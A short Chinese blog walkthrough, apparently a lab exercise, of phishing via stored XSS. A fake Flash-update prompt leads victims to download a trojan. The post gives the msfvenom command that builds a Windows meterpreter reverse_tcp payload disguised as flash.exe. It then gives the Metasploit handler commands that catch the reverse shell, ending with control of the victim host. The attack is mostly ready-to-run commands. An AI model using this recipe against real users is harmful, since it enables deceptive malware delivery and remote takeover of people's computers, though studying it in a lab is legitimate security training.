XSS-Flash攻击钓鱼

1.本机phpstudy中开启web服务
2.来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹ 站的根⽬录下⾯

3.修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址

4.进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个⽊ ⻢

(1)MSF⽣成Payload,执行下面代码后会生成一个shell.exe文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=(虚拟机的ip) LPORT=44
44 -f exe > shell.exe

(2)开启监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost (虚拟机的IP)
set lport 4444
run

(3)将shell.exe拖到www目录下并修改为flash.exe

5.打开pikachu存储型xss下载flash.exe并运行

6.虚拟机得到主机控制权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值